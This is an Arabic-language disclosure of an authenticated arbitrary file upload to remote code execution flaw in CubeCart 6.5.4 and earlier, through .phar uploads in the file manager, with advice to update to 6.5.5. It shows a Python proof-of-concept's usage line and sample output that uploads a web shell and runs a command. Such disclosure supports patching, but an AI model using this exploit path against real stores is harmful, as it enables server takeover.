
CubeCart <= 6.5.4 عرضة لتحميل ملف عشوائي يؤدي إلى تنفيذ تعليمات برمجية عن بعد (RCE).
CubeCart <= 6.5.4 معرض لمشكلة رفع ملف تعسفي تؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE). تؤثر الثغرة على مدير الملفات الخاص بالتطبيق ومرشحاته من خلال السماح للمهاجمين برفع ملفات .phar تحتوي على تعليمات برمجية ضارة. يجب تحديث CubeCart إلى الإصدار 6.5.5 لأنه يطبق تصحيحًا أمنيًا لإصلاح هذه الثغرة.
لمزيد من التفاصيل، يُرجى الاطلاع على الإعلان الرسمي من CubeCart في المراجع.
تم إنشاء إثبات مفهوم آلي (PoC)، ولكن يمكن أيضًا استغلال هذه الثغرة يدويًا عن طريق رفع ملف .phar ضار عبر مدير الملفات.
هذه هي طريقة استخدام إثبات المفهوم:
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
بعد تشغيله، هذا هو المخرجات المتوقعة لاستغلال ناجح:
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami
[] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...
Output: www-data